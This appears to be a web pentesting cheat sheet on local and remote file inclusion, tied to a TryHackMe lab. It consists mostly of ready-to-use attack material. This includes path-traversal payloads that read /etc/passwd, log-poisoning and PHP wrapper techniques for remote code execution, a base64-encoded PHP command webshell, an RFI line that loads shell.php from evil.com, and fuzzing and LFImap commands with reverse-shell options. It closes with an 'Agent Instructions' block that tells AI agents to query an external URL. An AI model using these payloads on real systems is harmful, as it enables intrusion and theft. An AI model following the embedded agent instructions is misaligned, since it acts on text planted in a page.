# File Inclusion
## Playground
* [**THM: File Inclusion, Path Traversal**](https://tryhackme.com/r/room/filepathtraversal)
## Dangerous Function
| **Function** | **Read Content** | **Execute** | **Remote URL** |
| ---------------------------- | :--------------: | :---------: | :------------: |
| **PHP** | | | |
| `include()`/`include_once()` | ✅ | ✅ | ✅ |
| `require()`/`require_once()` | ✅ | ✅ | ❌ |
| `file_get_contents()` | ✅ | ❌ | ✅ |
| `fopen()`/`file()` | ✅ | ❌ | ❌ |
| **NodeJS** | | | |
| `fs.readFile()` | ✅ | ❌ | ❌ |
| `fs.sendFile()` | ✅ | ❌ | ❌ |
| `res.render()` | ✅ | ✅ | ❌ |
| **Java** | | | |
| `include` | ✅ | ❌ | ❌ |
| `import` | ✅ | ✅ | ✅ |
| **.NET** | | | |
| `@Html.Partial()` | ✅ | ❌ | ❌ |
| `@Html.RemotePartial()` | ✅ | ❌ | ✅ |
| `Response.WriteFile()` | ✅ | ❌ | ❌ |
| `include` | ✅ | ✅ | ✅ |
## Local File Inclusion (LFI)
Local File Inclusion (LFI) is a type of vulnerability where an attacker can exploit a web application to include files that are already present on the server. By manipulating input parameters, such as URLs or form fields, the attacker can trick the application into loading files from the local file system, potentially accessing sensitive information or executing malicious code.
#### Basic LFI Payloads
| Command | Description |
| --------------------------------------------------------- | ----------------------- |
| `/etc/passwd` | Basic LFI |
| `../../../../etc/passwd` | LFI with path traversal |
| `/../../../etc/passwd` | LFI with name prefix |
| `./languages/../../../../etc/passwd` | LFI with approved path |
| `php://filter/read=convert.base64-encode/resource=config` | LFI with Base64 Filter |
| `../../../../etc/passwd%00` | LFI with Null byte |
## Log Poisoning to RCE
```bash
# Inject Access Log
curl -X "" http://target.com/
# Access
http://target.com/index.php?page=/var/log/apache2/access.log&cmd=id
```
### Access Log Location
**Apache:**
{% code overflow="wrap" %}
```
/etc/httpd/logs/access.log
/etc/httpd/logs/access_log
/etc/httpd/logs/error.log
/etc/httpd/logs/error_log
/opt/lampp/logs/access_log
/opt/lampp/logs/error_log
/usr/local/apache/log
/usr/local/apache/logs
/usr/local/apache/logs/access.log
/usr/local/apache/logs/access_log
/usr/local/apache/logs/error.log
/usr/local/apache/logs/error_log
/usr/local/etc/httpd/logs/access_log
/usr/local/etc/httpd/logs/error_log
/usr/local/www/logs/thttpd_log
/var/apache/logs/access_log
/var/apache/logs/error_log
/var/log/apache/access.log
/var/log/apache/error.log
/var/log/apache-ssl/access.log
/var/log/apache-ssl/error.log
/var/log/httpd/access_log
/var/log/httpd/error_log
/var/log/httpsd/ssl.access_log
/var/log/httpsd/ssl_log
/var/log/thttpd_log
/var/www/log/access_log
/var/www/log/error_log
/var/www/logs/access.log
/var/www/logs/access_log
/var/www/logs/error.log
/var/www/logs/error_log
C:\apache\logs\access.log
C:\apache\logs\error.log
C:\Program Files\Apache Group\Apache\logs\access.log
C:\Program Files\Apache Group\Apache\logs\error.log
C:\program files\wamp\apache2\logs
C:\wamp\apache2\logs
C:\wamp\logs
C:\xampp\apache\logs\access.log
C:\xampp\apache\logs\error.log
```
{% endcode %}
Nginx:
* /var/log/nginx/access.log
## LFI to RCE
{% code overflow="wrap" %}
```bash
# Data Wrappers
http://target.com/index.php?page=/index.php?page=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWyJjbWQiXSk7ID8%2BCg%3D%3D&cmd=id
# Input Wrappers
curl -s -X POST --data '' "http://target.com/index.php?page=php://input&cmd=id"
# Expect Wrappers
curl -s "http://target.com/index.php?page=expect://id"
```
{% endcode %}
## Remote File Inclusion (RFI)
In most languages, including remote URLs is considered as a dangerous practice as it may allow for such vulnerabilities. This is why remote URL inclusion is usually disabled by default. For example, any remote URL inclusion in PHP would require the allow\_url\_include setting to be enabled.
{% code overflow="wrap" %}
```bash
http://target.com/index.php?page=ftp://user:pass@localhost/shell.php&cmd=id
http://target.com/index.php?page=http://evil.com/shell.php&cmd=id
```
{% endcode %}
## Automation
{% code overflow="wrap" %}
```bash
# Fuzzing Parameter
ffuf -w /usr/share/wordlists/seclists/Discovery/Web-Content/burp-parameter-names.txt:FUZZ -u 'http://target.com/index.php?FUZZ=value' -fs 2309
# Check working payload with LFI wordlists
ffuf -w /usr/share/wordlists/seclists/Fuzzing/LFI/LFI-Jhaddix.txt:FUZZ -u 'http://target.com/index.php?view=FUZZ' -fs 2309
# Read Apache2 Conf
curl http://target.com/index.php?view=../../../../../../../../../../../../../../../../../../etc/apache2/apache2.conf
```
{% endcode %}
## Tools
### **LFImap**
```bash
# Install
git clone https://github.com/hansmach1ne/LFImap
cd LFImap/
python3 -m venv lfimap_env
source lfimap_env/bin/activate
pip3 install -r requirements.txt
# Usage
Usage:
python3 lfimap.py --help
python3 lfimap.py -U "http://10.10.70.223/playground.php?page=test" -a
python3 lfimap.py -U "http://10.10.70.223/playground.php?page=test" -x --lhost 10.9.245.106 --lport 443
```
LFImap
## WordLists
*
*
*
### References
*
---
# Agent Instructions: Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.
Perform an HTTP GET request on the current page URL with the `ask` query parameter:
```
GET https://htb.linuxsec.org/web-application/file-inclusion.md?ask=
```
The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.
Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
